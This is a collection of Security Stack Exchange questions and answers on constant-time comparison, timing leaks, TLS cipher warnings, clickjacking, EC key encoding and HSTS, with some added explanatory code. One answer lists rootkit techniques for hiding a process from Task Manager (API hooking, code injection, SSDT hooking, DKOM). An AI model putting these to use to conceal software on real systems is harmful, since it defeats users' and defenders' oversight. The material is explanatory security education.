More I found here: http://www.levigross.com/2014/02/07/constant-time-comparison-functions-in-python-haskell-clojure-java-etc/
Python (2.x):
#Taken from Django Source Code
def constant_time_compare(val1, val2):
"""
Returns True if the two strings are equal, False otherwise.
The time taken is independent of the number of characters that match.
For the sake of simplicity, this function executes in constant time only
when the two strings have the same length. It short-circuits when they
have different lengths.
"""
if len(val1) != len(val2):
return False
result = 0
for x, y in zip(val1, val2):
result |= ord(x) ^ ord(y)
return result == 0 Python 3.x #This is included within the stdlib in Py3k for an C alternative for Python 2.7.x see https://github.com/levigross/constant_time_compare/
from operator import _compare_digest as constant_time_compare
# Or you can use this function taken from Django Source Code
def constant_time_compare(val1, val2):
"""
Returns True if the two strings are equal, False otherwise.
The time taken is independent of the number of characters that match.
For the sake of simplicity, this function executes in constant time only
when the two strings have the same length. It short-circuits when they
have different lengths.
"""
if len(val1) != len(val2):
return False
result = 0
for x, y in zip(val1, val2):
result |= x ^ y
return result == 0 Haskell import Data.Bits
import Data.Char
import Data.List
import Data.Function
-- Thank you Yan for this snippet
constantTimeCompare a b =
  ((==) `on` length) a b && 0 == (foldl1 (.|.) joined)
  where
    joined = zipWith (xor `on` ord) a b
Ruby
def secure_compare(a, b)
  return false if a.empty? || b.empty? || a.bytesize != b.bytesize
  l = a.unpack "C#{a.bytesize}"
  res = 0
  b.each_byte { |byte| res |= byte ^ l.shift }
  res == 0
end
Java (general)
// Taken from http://codahale.com/a-lesson-in-timing-attacks/
public static boolean isEqual(byte[] a, byte[] b) {
    if (a.length != b.length) {
        return false;
    }
    int result = 0;
    for (int i = 0; i < a.length; i++) {
        result |= a[i] ^ b[i];
    }
    return result == 0;
} | {
"source": [
"https://security.stackexchange.com/questions/83660",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5707/"
]
} |
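To show what the attack in the question above actually exploits, here is a toy Python measurement; the secret, the round count and the size of the measurable gap are illustrative, and against a real network service an attacker needs many samples and statistical filtering to see the same effect. An early-exit comparison runs longer the more leading bytes of the guess are correct, which is what lets a MAC be recovered byte by byte.

# Toy demonstration of why early-exit comparison leaks timing information
import time

SECRET = b"\x8f\x11\xa7\x39" * 8  # stand-in for a server-side MAC

def naive_equals(a: bytes, b: bytes) -> bool:
    if len(a) != len(b):
        return False
    for x, y in zip(a, b):
        if x != y:
            return False  # exits at the first mismatch
    return True

def average_time(guess: bytes, rounds: int = 200_000) -> float:
    start = time.perf_counter()
    for _ in range(rounds):
        naive_equals(SECRET, guess)
    return (time.perf_counter() - start) / rounds

wrong_first_byte = b"\x00" + SECRET[1:]   # mismatch immediately
wrong_last_byte = SECRET[:-1] + b"\x00"   # mismatch only at the end
print("first byte wrong:", average_time(wrong_first_byte))
print("last byte wrong: ", average_time(wrong_last_byte))
# The second average is consistently larger: the running time reveals how long
# the correctly guessed prefix is, which the constant-time functions listed
# above are designed to avoid.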
83,677 | Alice wants to share a message with Bob, but Alice and Bob can never be in the same place at the same time. We can assume they both know each others public keys (or agreed on a shared key, if that makes a difference). Is it safe for Alice to broadcast the ciphertext over the TV/radio/public internet/etc, or should she send Bob the ciphertext over video chat/phone/email? I understand that modern algorithms are resistant to ciphertext-only attacks, but is the layer of obscuring the email from the public practically beneficial? | That is exactly what encryption is designed to safely enable. If Bob and Alice could safely share the message without allowing attackers and eavesdroppers access to it, they would not, in fact, need encryption at all. So, yes, it is safe to allow any and everyone access to the ciphertext. You do want to authenticate it so that it cannot be tampered with in transit, but done correctly, we don't believe there is any non-negligible risk of compromising the confidentiality of the message. | {
"source": [
"https://security.stackexchange.com/questions/83677",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70166/"
]
} |
83,692 | Androids apps use fine-grained permissions for security reasons, iOS apps (afaik) do it as well. Windows 8.1 applications don't have a permission schema like that, all Linux versions which I have tried so far don't have it either and I guess Mac OS X also doesn't have it, right? Why are these fine-grained permissions considered necessary on a mobile device, but not on a desktop system? Do users trust apps on a mobile device less than on a desktop system? Will Windows 10 or newer Linux and Mac OS versions have them? PS: it seems that some people consider this to be a possible duplicate to Why are apps for mobile devices more restrictive than for desktop? - but both questions differ at least in the point of view (developer/user). And if you read the answer, you will also see that most SO users consider both questions as beeing different :-) | There are two main reasons why smartphones have fine-grained permissions while desktop computers don't. History. Mainframe operating systems have a tradition of giving permissions to the user rather than to the program , and this carried over into minicomputers/workstations/desktops; the desire to maintain compatibility with existing programs limits the ability to change things. Smartphones are a clean break with existing application ecosystems, so the opportunity existed to change the permissions model. Smartphones are far more homogeneous than desktops, and generally don't change their hardware configuration over time. This makes setting up the permissions system far easier. That said, there are fine-grained permission systems for desktop operating systems. Linux, for example, has AppArmor, SELinux, Bitfrost, and probably others. | {
"source": [
"https://security.stackexchange.com/questions/83692",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5203/"
]
} |
83,831 | Google Chrome is showing new information in the certificate section. Is this a big deal? If so how can I fix it on the server end? EDIT: Thanks for the answers but I'm not skilled in cryptography so the only thing I can update with is this certificate was created by Shell in a Box, and I was also wondering if this was ruining the security of TLS/SSL communication with the application and if so, how I could fix it. | Your exact case is that RSA is used as the key exchange mechanism. Instead, you should use DHE_RSA or ECDHE_RSA . To remove the "obsolete cryptography" warning, you'll need to use "modern cryptography" which is defined as: Protocol: TLS 1.2 or QUIC Cipher: AES_128_GCM or CHACHA20_POLY1305 Key exchange: DHE_RSA or ECDHE_RSA or ECDHE_ECDSA Twitter discussion: https://twitter.com/reschly/status/534956038353477632 Commit: https://codereview.chromium.org/703143003 This has nothing to do with a certificate. There is a special "outdated security settings" warning when a certificate uses weak signature algorithm, but this is about authentication, not about encryption. Note that you are still getting a green lock, even in case of obsolete encryption. | {
"source": [
"https://security.stackexchange.com/questions/83831",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69936/"
]
} |
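The actual fix for the answer above belongs in the web server's TLS settings (for Apache or nginx, enabling TLS 1.2 and ECDHE/AES-GCM cipher suites in its SSL configuration). If the server happens to be Python-based, a hedged sketch of restricting a context to forward-secret AEAD suites looks like this; the certificate paths are placeholders.

# Sketch: offer only TLS 1.2+ with ECDHE key exchange and AES-GCM,
# which matches the "modern cryptography" criteria quoted above
import ssl

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("server.crt", "server.key")  # placeholder paths
ctx.minimum_version = ssl.TLSVersion.TLSv1_2
ctx.set_ciphers("ECDHE+AESGCM")  # drops the plain-RSA key exchange that triggers the warning

The resulting context is then handed to whatever framework or server wraps the listening socket.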
84,229 | I have registered a .com domain and received an e-mail from domainadmin.com, it looks extremely like a phishing e-mail, but after a research I am ultimately confused whether this thing is legitimate or not, it seems as something new for sure. It basically asks you to click a button, where you agree to some terms and conditions that I don't want to read, as I've got other work to do. There is the contract: http://approve.domainadmin.com/registrant/index.cgi?action=contract And this is the e-mail I received: Please read this important e-mail carefully. Recently you registered, transferred or modified the contact information for the following domain name: domain.com In order to ensure your domain name remain active, you must now click the following link and follow the instructions provided. Did anyone come across? | As Polynomial mentioned, this is part of ICANN-mandated WHOIS verification. The reason it goes to domainadmin.com is that ICANN doesn't actually run the verification -- rather, like just about all ICANN things, they set policies that are then implemented by others (remember, your .com domain is in a registry operated by Verisign, and was registered by a registrar who was neither ICANN nor Verisign). It's the registrar's job to verify certain WHOIS info; the relevant policy is here , and they must suspend your domain if they can't verify the info. The reason you're seeing domainadmin.com is that whoever you bought your domain from is likely reselling them from OpenSRS (which basically exists as a platform for domain resellers), which is a label of Tucows. As the registrar, Tucows is responsible for WHOIS verification on domains bought from them; because OpenSRS is mostly a platform for resellers, they generally do so via domainadmin.com (which they own, and which is intentionally white-label). Source 1, and a discussion on their site about this domain choice. So, this email is likely legitimate, and you need to do what it says or your domain will be suspended. domainadmin.com isn't affiliated with ICANN, it's affiliated with your registrar (you actually bought your domain from a reseller of this registrar). It's intentionally generic because some resellers want a generic thing; resellers who want non-generic have the option to make it non-generic, but most resellers don't want it showing OpenSRS or Tucows prominently. | {
"source": [
"https://security.stackexchange.com/questions/84229",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69348/"
]
} |
84,236 | I was chatting to a guy on a site, and the chat went wrong when I wrote a few wrong words by mistake. He then threatened that he will send my every detail to the vigilant team and soon my address will be known. He then showed me my IP address, the Windows version I am using, the browser, and other stuff. What should I do now to save myself? | Don't worry about it, those are things that any website you visit can obtain. The OS and browser info might help them develop a more targeted attack, but as long as your home firewall is secured these are likely empty threats. They could target a botnet at you to DDoS your connection, but many ISPs will notice this traffic and might block as much as possible (flood detection) or might assign you a different IP address anyway. If you're paranoid, try powering your modem off for about half an hour. You will usually get a new IP address assigned to you from your ISP. | {
"source": [
"https://security.stackexchange.com/questions/84236",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70768/"
]
} |
84,327 | Is there any way to convert an ECC private key to RSA PKCS#1 format?
I have tried converting it to PKCS#8 first using OpenSSL: openssl pkcs8 -topk8 -nocrypt -in EC_key.pem -out pkcs8_key.pem This results in a pem file that is in (what I am assuming) the right PKCS#8 format -----BEGIN PRIVATE KEY-----
[snip]
-----END PRIVATE KEY----- When trying to then convert it from PKCS#8 to PKCS#1 using the following command: openssl pkcs8 -inform pem -nocrypt -in pkcs8_key.pem -out pkcs1_key.pem I get the same file as from the previous step. When using the following command for conversion: openssl rsa –in pkcs8_key.pem –out pkcs1_key.pem I get the following error: 47049676604576:error:0607907F:digital envelope routines:EVP_PKEY_get1_RSA:expecting an rsa key:p_lib.c:279: Can EC keys be converted to RSA PKCS#1 keys? And if yes, how? | There might be a bit of confusion here between "RSA Laboratories", the organization that edits the PKCS standards, and RSA, the cryptographic algorithm. PKCS#1 is one of the PKCS standards, thus edited by RSA Laboratories; it talks about the algorithm RSA, and only about the RSA algorithm. In particular, there is no such thing as a "PKCS#1 format" for elliptic curve (EC) keys, because EC keys are not RSA keys -- they are EC keys, which is not at all the same kind of object. However, confusion has spread a lot further, so let's unravel a few layers. PKCS#1 talks about RSA and defines an ASN.1-based encoding for RSA private keys. It looks like this: RSAPrivateKey ::= SEQUENCE {
version Version,
modulus INTEGER, -- n
publicExponent INTEGER, -- e
privateExponent INTEGER, -- d
prime1 INTEGER, -- p
prime2 INTEGER, -- q
exponent1 INTEGER, -- d mod (p-1)
exponent2 INTEGER, -- d mod (q-1)
coefficient INTEGER, -- (inverse of q) mod p
otherPrimeInfos OtherPrimeInfos OPTIONAL
} We recognize here the various mathematical elements that constitute a RSA public/private key pair. Being based on ASN.1 , this kind of object encodes (through DER ) into some bytes. OpenSSL can produce and consume such a sequence of bytes; however, it is commonplace to further reencode these bytes into the traditional (and poorly specified) PEM format: the bytes are encoded with Base64 , and a header and footer are added, that specify the kind of encoded object. It is important to notice that the raw ASN.1-based format for RSA private keys, defined in PKCS#1, results in sequences of bytes that do NOT include an unambiguous identification for the key type. Any application that reads a DER-encoded RSA private key in that format must already know, beforehand, that it should expect a RSA private key. The PEM header, that says "RSA PRIVATE KEY", provides that information. Since the PKCS standards don't talk about PEM, they provide their own solution to the issue of identifying the key type; it is called PKCS#8 . A key in PKCS#8 format is again ASN.1-based, with a structure that looks like this: PrivateKeyInfo ::= SEQUENCE {
version Version,
privateKeyAlgorithm AlgorithmIdentifier {{PrivateKeyAlgorithms}},
privateKey PrivateKey,
attributes [0] Attributes OPTIONAL }
Version ::= INTEGER {v1(0)} (v1,...)
PrivateKey ::= OCTET STRING What this means is that a PKCS#8 object really is a wrapper around some other format. In the case of a RSA private key, the wrapper indicates (through the privateKeyAlgorithm field) that the key is really a RSA key, and the contents of the PrivateKey field (an OCTET STRING , i.e. an arbitrary sequence of bytes) really are the DER encoding of a PKCS#1 private key. OpenSSL, by default, won't let a PKCS#8 file live its life as a DER-encoded sequence of bytes; it will again convert it to PEM, and, this time, will add the "BEGIN PRIVATE KEY" header. Note that this header does not specify the key type, since the encoded object (turned to characters through Base64) already contains the information. (As a further complication, PKCS#8 also defines an optional, often password-based encryption of private keys; and the traditional PEM-like format that OpenSSL implements also includes some generic support for password-based encryption; so you can have multiple combinations of wrappers that specify some kind of encryption, resulting in what can only be described as an utter mess.) Now what does this tells us about EC keys ? EC keys are not described by PKCS#1 (that talks only about RSA). However, if there is a standard somewhere that says how an EC private key can be turned into a sequence of bytes, then: that sequence of bytes could be PEM-encoded by OpenSSL with some explicit text header; the same sequence of bytes could be wrapped into a PKCS#8 object. And this is exactly what happens. The standard that defines the encoding format for EC keys is SEC 1 (nominally, the standard for EC cryptography is ANSI X9.62; however, while X9.62 reused much of SEC 1, the specification for encoding private EC keys is only in SEC 1, because X9.62 concerns itself only with the encoding of public keys). In SEC 1 (section C.4), the following is defined: ECPrivateKey ::= SEQUENCE {
version INTEGER { ecPrivkeyVer1(1) },
privateKey OCTET STRING,
parameters [0] EXPLICIT ECDomainParameters OPTIONAL,
publicKey [1] EXPLICIT BIT STRING OPTIONAL
} So an encoded private key contains the private key itself (a integer in the 1.. n -1 range, where n is the curve subgroup order), optionally a description or reference to the used curve, and optionally a copy of the public key (which could otherwise be recomputed). Let's try it. We generate with OpenSSL a new EC key pair, in the standard NIST P-256 curve (which is the curve that everybody implements and uses): $ openssl ecparam -out ec1.pem -genkey -name prime256v1 We get this, in the ec1.pem file: $ cat ec1.pem
-----BEGIN EC PARAMETERS-----
BggqhkjOPQMBBw==
-----END EC PARAMETERS-----
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIBdVHnnzZmJm+Z1HAYYOZlvnB8Dj8kVx9XBH+6UCWlGUoAoGCCqGSM49
AwEHoUQDQgAEThPp/xgEov0mKg2s0GII76VkZAcCc//3quAqzg+PuFKXgruaF7Kn
3tuQVWHBlyZX56oOstUYQh3418Z3Gb1+yw==
-----END EC PRIVATE KEY----- The first element ("EC PARAMETERS") is redundant; it contains a reference to the used curve, but this information is also present in the second element. So let's use a text editor to remove the "EC PARAMETERS", and we keep only the "EC PRIVATE KEY" part. Now my ec1.pem file looks like this: $ cat ec1.pem
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIBdVHnnzZmJm+Z1HAYYOZlvnB8Dj8kVx9XBH+6UCWlGUoAoGCCqGSM49
AwEHoUQDQgAEThPp/xgEov0mKg2s0GII76VkZAcCc//3quAqzg+PuFKXgruaF7Kn
3tuQVWHBlyZX56oOstUYQh3418Z3Gb1+yw==
-----END EC PRIVATE KEY----- We can use OpenSSL to decode its structure: $ openssl asn1parse -i -in ec1.pem
0:d=0 hl=2 l= 119 cons: SEQUENCE
2:d=1 hl=2 l= 1 prim: INTEGER :01
5:d=1 hl=2 l= 32 prim: OCTET STRING [HEX DUMP]:17551E79F3666266F99D4701860E665BE707C0E3F24571F57047FBA5025A5194
39:d=1 hl=2 l= 10 cons: cont [ 0 ]
41:d=2 hl=2 l= 8 prim: OBJECT :prime256v1
51:d=1 hl=2 l= 68 cons: cont [ 1 ]
53:d=2 hl=2 l= 66 prim: BIT STRING We recognize the expected ASN.1 structure, as defined by SEC 1: a SEQUENCE that contains an INTEGER of value 1 (the version field), an OCTET STRING (the privateKey itself, which is a big-endian unsigned encoding of the mathematical private key), a reference (tagged with [0] ) to the used curve (in the ASN.1 object it is the OID 1.2.840.10045.3.1.7; OpenSSL translates that to the name "prime256v1"), and (tagged with [1] ) a copy of the public key. We can convert that to the (unencrypted) PKCS#8 format: $ openssl pkcs8 -topk8 -nocrypt -in ec1.pem -out ec2.pem which yields this: $ cat ec2.pem
-----BEGIN PRIVATE KEY-----
MIGHAgEAMBMGByqGSM49AgEGCCqGSM49AwEHBG0wawIBAQQgF1UeefNmYmb5nUcB
hg5mW+cHwOPyRXH1cEf7pQJaUZShRANCAAROE+n/GASi/SYqDazQYgjvpWRkBwJz
//eq4CrOD4+4UpeCu5oXsqfe25BVYcGXJlfnqg6y1RhCHfjXxncZvX7L
-----END PRIVATE KEY----- that we can decode with OpenSSL: $ openssl asn1parse -i -in ec2.pem
0:d=0 hl=3 l= 135 cons: SEQUENCE
3:d=1 hl=2 l= 1 prim: INTEGER :00
6:d=1 hl=2 l= 19 cons: SEQUENCE
8:d=2 hl=2 l= 7 prim: OBJECT :id-ecPublicKey
17:d=2 hl=2 l= 8 prim: OBJECT :prime256v1
27:d=1 hl=2 l= 109 prim: OCTET STRING [HEX DUMP]:306B0201010420(...) (I have truncated the hexadecimal dump.) This structure is indeed a PKCS#8 object: The algorithm identifier field says: "this contains an EC key" (technically, it uses an identifier whose name is "id-ecPublicKey", but since this occurs in a PKCS#8 file everybody knows that this really means an EC private key). The file includes as key parameters a reference to the used curve. The key value is encoded into the contents of an OCTET STRING . If we further decode that OCTET STRING, we will find the EC private key encoded as specified by SEC 1 (amusingly, the reference to the curve appears to have been omitted in that case, since it is already present in the key parameters). Conversion can be made in the other direction (from PKCS#8 to raw SEC 1 format) with: $ openssl ec -in ec2.pem -out ec3.pem You will then get in file ec3.pem exactly what you had in file ec1.pem : a PEM-encoded object with header "BEGIN EC PRIVATE KEY". Summary: There is no such thing as an "EC key in PKCS#1 format": PKCS#1 is only for RSA keys, not EC keys. However, there is another format, analogous to PKCS#1 but made for EC keys, and defined in SEC 1. OpenSSL can convert that format into the generic PKCS#8 with the " openssl pkcs8 " command, and back into SEC 1 format with " openssl ec ". | {
"source": [
"https://security.stackexchange.com/questions/84327",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70853/"
]
} |
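The same SEC 1 / PKCS#8 round trip shown above with the openssl command line can be reproduced programmatically. Here is a sketch using the Python cryptography package (exact arguments vary slightly between library versions, e.g. older releases also require a backend parameter): its PrivateFormat.TraditionalOpenSSL corresponds to the SEC 1 "BEGIN EC PRIVATE KEY" encoding, and PrivateFormat.PKCS8 to the wrapped "BEGIN PRIVATE KEY" form.

# Serialize one P-256 private key in both encodings discussed above
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import serialization

key = ec.generate_private_key(ec.SECP256R1())

sec1_pem = key.private_bytes(
    serialization.Encoding.PEM,
    serialization.PrivateFormat.TraditionalOpenSSL,  # SEC 1: "BEGIN EC PRIVATE KEY"
    serialization.NoEncryption(),
)
pkcs8_pem = key.private_bytes(
    serialization.Encoding.PEM,
    serialization.PrivateFormat.PKCS8,               # wrapper: "BEGIN PRIVATE KEY"
    serialization.NoEncryption(),
)
print(sec1_pem.decode())
print(pkcs8_pem.decode())

# Either PEM loads back to the same key; the PKCS#8 form simply carries the
# algorithm identifier alongside the SEC 1 payload.
key_again = serialization.load_pem_private_key(pkcs8_pem, password=None)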
84,377 | As I understand it, this is how an attacker would exploit clickjacking: Create a new website malicioussite.com which includes my site in a frame, but overlays malicious input fields or buttons over the HTML elements of my site. Send out phishing emails to get users to click on the link that goes to malicioussite.com rather than my site (or use some other technique to distribute the phishing link). Users enter data into or click on the malicious elements. Profit Savvy users would either not click the link, or notice that the address bar is incorrect. However, plenty of people would probably not notice. My question is this: Can't the attacker achieve the same thing by using malicioussite.com as a reverse proxy? All the steps above would be the same, except that malicioussite.com would forward the requests to my site and then insert an extra <script> tag in the HTML response to run the malicious code and add the malicious HTML elements. The X-FRAME-OPTIONS header wouldn't help in that case because there are no frames (and the reverse proxy can strip it out anyway). The attack relies on the user not checking the address bar, so if the attacker can implement the same attack in a different way that can't be defeated, why bother with X-FRAME-OPTIONS or other clickjacking protections? | This is a very interesting question. First of all, let's start with your scenario: A user visiting website www.evil.com which is a reverse proxy that loads www.good.com and modifies its content. Congratulations ! You've just re-invented a classic MiTM attack , but a very poor one. Visiting evil.com means that your browser won't send good.com cookies, which means that your reverse proxy won't be able to act on behalf of the user. To fix this, now you'll have to trick the user into logging in to your reverse proxy with his good.com . Congratulations ! You've re-invented an attack with a fake landing page. The scenario you're describing has nothing to do with clickjacking, and we actually employ clickjacking protection for a very different reason: With clickjacking, an attacker would trick an authenticated user into performing some action. Even if the user is visiting evil.com , unlike your proposed scenario with a reverse proxy, his request is still sent to good.com along with the cookies containing his session ID. Thus, the action will be performed within the authenticated user's session. Does that sound familiar? Yes it does, because that's how a CSRF attack works, but the only difference is that, with CSRF, the action is performed programatically.. except for one little thing: Clickjacking defeats anti-CSRF mechanisms. With clickjacking, the action is performed within the user's browser, by the user himself, and inside the legitimate page (loaded within iFrame). So, in short: Your proposed attack is indeed plausible, but we use anti-clickjacking to defeat completely different attacks. For that, yes, clickjacking is indeed a real, distinct security concern. | {
"source": [
"https://security.stackexchange.com/questions/84377",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70881/"
]
} |
84,385 | Can malicious software hide itself, so its activity doesn't appear in the list of processes from Task Manager? Can it hide itself so when someone is controlling your computer, even if you open Task manager, you won't see any suspicious activity? If yes, how can it do that? What techniques can be used to hide in this way? | Yes. There are a number of ways: Directly patch Task Manager's process at runtime so that its enumeration code skips over your process. Run "processless", by loading a DLL into a process (e.g. via AppInit_DLLs ) or injecting code into process memory and starting a thread (via VirtualAllocEx / WriteProcessMemory / CreateRemoteThread ). Hook the Process32First / Process32Next functions in every process (incl. task manager) to "skip" your process when the enumeration is performed. Hook CreateToolhelp32Snapshot so that the mapped section's memory (see here for how snapshots work) is modified ahead of time, so that Process32First / Process32Next end up reading from fake data. Hook ntdll.dll!NtQuerySystemInformation and, if SystemProcessInformation is passed, patch the results to skip over your process. This is a lower level hook than the above calls. Load a kernel-mode driver which hooks the kernel-mode handler for SystemProcessInformation queries. I don't know the real name for this in Windows (it's not documented) but essentially there's a table of handlers which NtQuerySystemInformation looks through for this purpose, and you just have to hook the right one. Here's the ReactOS implementation of the actual handler. In this you'd just mess with the returned structs so that your process isn't shown. Hook the SSDT to catch the transition between user-mode and kernel-mode for when various process enumeration APIs are called. Use Direct Kernel Object Manipulation (DKOM) to modify the EPROCESS structures in memory so that your process is hidden from the kernel entirely. The kernel maintains a circularly linked list of structures which represent all running processes, with FLink and BLink fields as forward and backward pointers respectively. By manipulating those pointers to jump over your process, then manipulating your process' pointers to go back to themselves, the kernel will skip over your process during enumeration. This is a common rootkit technique. | {
"source": [
"https://security.stackexchange.com/questions/84385",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/69756/"
]
} |
84,397 | Disclaimer: as you will see from my question I'm a total outsider in this subject, just very curious. I was wondering how easy it would be to crack a password-protected RAR5 file, and I found many answers along the lines of "a truly random password would be much more difficult to crack than a password based on real words". Also, a lot of answers refer to password randomness. I know that passwords based on real words are easily cracked by dictionary attacks and probably this is what those answers refer to, but I'm still not clear about what "random" means in the context of password creation, for the following reason. Even if I generate a sequence of characters using the best "randomizer" ever, the chances that I get HelloWorld and the chances that I get f.ex. gkwwpBnePU are in my understanding exactly the same, so does "random" in this context mean "as distant as possible from any real word" ? But if yes, doesn't this make the password not-so-random after all? The thought that started my doubt - which I believe is the same concept but I'm not sure - is: if I choose a password which is a real word but from an obscure dialect of a very uncommon language whose dictionary no attackers would feed to their cracking tools, would such password still be more crackable than gkwwpBnePU ? (assuming of course that gkwwpBnePU isn't actually a real word in any language, see what I mean?). | "Random" means: "that which the attacker does not know". The important point to understand is that attack costs are always on average . They don't make sense on a single data point. An attacker may always get lucky and find the right password on his first try. This is merely improbable. If you generate passwords as sequences of purely random characters, then you may obtain "HelloWorld"; but usually you won't, and, crucially, the attacker won't be able to guess with non-negligible probability that your password consists of two concatenated English words because, on average , it does not. One way to say it is that password entropy is not a property of the password, but of the process that generated the password; and it does not impact the contents of a single password, but the average contents of passwords, taken over sufficiently many experiments. More on password entropy here . Averages are still the important notion because the attacker, like everybody else, thinks in terms of economics (although he, like most other people, is not completely aware of it). The attacker won't bother attacking your password if his chances of breaking it are lower than his chances of winning millions of dollars at the lottery. Even if he may always "get lucky", the lottery is much less effort, and 50 millions of dollars are a lot more rewarding than an access to your Facebook account. | {
"source": [
"https://security.stackexchange.com/questions/84397",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56343/"
]
} |
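One way to see that entropy is a property of the generation process rather than of any single output, as the answer above argues, is to compute it for the process itself. A short worked example follows; the vocabulary size is a rough assumption.

# Entropy of the *process*: log2(number of equally likely outcomes)
from math import log2

alphabet = 26 + 26 + 10                  # a-z, A-Z, 0-9
length = 10
random_chars = length * log2(alphabet)   # about 59.5 bits for any 10-character output

english_words = 20000                    # rough working-vocabulary assumption
two_words = 2 * log2(english_words)      # about 28.6 bits if the attacker knows
                                         # the password is two concatenated words
print(round(random_chars, 1), round(two_words, 1))

The string HelloWorld costs an attacker roughly 60 bits of work if it came out of the uniform character process, but only about 29 bits if it came out of the "pick two common words" process; the gap lies entirely in the process, not in the string.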
84,465 | I have a simple login form on my web page and the URL looks like this: example.com/signup/signup.php?q=1 If I try something like this: example.com/signup/signup.php?q=1&() I'm redirected to a stack dump that looks something like this: exception 'DOMException' with message 'Invalid Character Error' in /<mydirectory>/a_xml.class.php:74
Stack trace:
#0 /<mydirectory>/a_xml.class.php(74): DOMDocument->createElement('()')
...
#6 {main} Is this a big problem in terms of security? Are there any attacks a malicious user can perform that will allow him to deface or steal my database? Or is this relatively benign and I can ignore it? | On production (contrary to development) environments, stack traces and error messages should be logged to file instead of dumped on screen. This is because an attacker may learn things about your system that could help compromise your system. Information such as operating system, web server version, PHP version and more. Some stack traces may contain system/environment variables that should not be made public! The user/visitor should get a nice looking HTTP error page instead of a message that is of no use to the visitor. | {
"source": [
"https://security.stackexchange.com/questions/84465",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70965/"
]
} |
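For the PHP application in the question above, the usual production settings are display_errors = Off and log_errors = On, plus a custom error page, so the trace still reaches the developers without reaching visitors. As a generic illustration of the same "log the details, show the user something bland" pattern in Python, with an assumed log file name:

# Log the full stack trace server-side; return only a generic message to the user
import logging

logging.basicConfig(filename="app-errors.log", level=logging.ERROR)

def handle_request(process):
    try:
        return process()
    except Exception:
        logging.exception("unhandled error while processing request")
        # no stack trace, no paths, no library versions leak to the client
        return "500 Internal Server Error", "Something went wrong."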
84,714 | Why does the RFC prohibit the server from sending HSTS to the client over HTTP? I can see that if a HTTP client responds to that unsecure HTTP response it might cause that site to be inaccessible to the client, but I don't see any reason for the server to have a MUST in the protocol. Rather the client MUST NOT respond to HSTS in unsecure HTTP responses is the correct approach in my mind. What am I missing? # 7.2. HTTP Request Type If an HSTS Host receives an HTTP request message over a non-secure
transport, it SHOULD send an HTTP response message containing a
status code indicating a permanent redirect, such as status code 301
( Section 10.3.2 of [RFC2616] ), and a Location header field value
containing either the HTTP request's original Effective Request URI
(see Section 9 ("Constructing an Effective Request URI")) altered as
necessary to have a URI scheme of "https", or a URI generated
according to local policy with a URI scheme of "https". NOTE: The above behavior is a "SHOULD" rather than a "MUST" due
to: Risks in server-side non-secure-to-secure redirects
[ OWASP-TLSGuide ]. Site deployment characteristics. For example, a site that
incorporates third-party components may not behave correctly
when doing server-side non-secure-to-secure redirects in the
case of being accessed over non-secure transport but does
behave correctly when accessed uniformly over secure transport.
The latter is the case given an HSTS-capable UA that has
already noted the site as a Known HSTS Host (by whatever means,
e.g., prior interaction or UA configuration). An HSTS Host MUST NOT include the STS header field in HTTP
responses conveyed over non-secure transport. | This client behavior is prohibited by section 8.1 of the RFC : If an HTTP response is received over insecure transport, the UA MUST ignore any present STS header field(s). The spec prohibits severs from sending insecure HSTS directives and clients from processing insecure HSTS directives. This ensures that a faulty implementation in either a server or client is not sufficient to undermine HSTS; the failure must be present in both for the weakness to be present. As noted in your question, HSTS over plain HTTP sounds like a great way for an attacker to implement long-term client-enforced denial of service on a service offered over HTTP. In fact, section 14.3 of RFC 6797 addresses this specifically (as well as an even more serious concern): The rationale behind this [ requirement that HSTS be served over secure connections only ] is that if there is a "man in the middle" (MITM) -- whether a legitimately deployed proxy or an illegitimate entity -- it could cause various mischief (see also Appendix A ("Design Decision Notes") item 3, as well as Section 14.6 ("Bootstrap MITM Vulnerability")); for example: Unauthorized notation of the host as a Known HSTS Host, potentially leading to a denial-of-service situation if the host does not uniformly offer its services over secure transport (see also Section 14.5 ("Denial of Service") ). Resetting the time to live for the host's designation as a Known HSTS Host by manipulating the max-age header field parameter value that is returned to the UA. If max-age is returned as zero, this will cause the host to cease being regarded as a Known HSTS Host by the UA, leading to either insecure connections to the host or possibly denial of service if the host delivers its services only over secure transport. Since HTTP can be easily spoofed, an attacker could specify an HSTS directive to treat an HTTP-only site as an HTTPS site: the client would then demand HTTPS and the server would be unable to supply it. More seriously, this section of the RFC indicates that an attacker who can issue HSTS directives for a host could strip the host's status as a Known HSTS Host, thereby dangerously allowing the client to issue plain HTTP requests to the host. | {
"source": [
"https://security.stackexchange.com/questions/84714",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/396/"
]
} |
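Both server-side halves of the requirement discussed above are easy to express in application code. Here is a hedged WSGI-style Python sketch (the max-age value and the bare redirect policy are illustrative): the STS header is only ever added to responses sent over TLS, and plain-HTTP requests get the permanent redirect that section 7.2 recommends.

# Sketch: never send Strict-Transport-Security over plain HTTP (the MUST NOT
# in section 7.2 quoted above), and answer insecure requests with a redirect
# to the https:// form of the URL
def hsts_middleware(app):
    def wrapped(environ, start_response):
        if environ.get("wsgi.url_scheme") != "https":
            host = environ.get("HTTP_HOST", "example.org")  # placeholder fallback
            location = "https://" + host + environ.get("PATH_INFO", "/")
            start_response("301 Moved Permanently", [("Location", location)])
            return [b""]

        def secure_start_response(status, headers, exc_info=None):
            headers.append(("Strict-Transport-Security",
                            "max-age=31536000; includeSubDomains"))
            return start_response(status, headers, exc_info)

        return app(environ, secure_start_response)
    return wrapped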
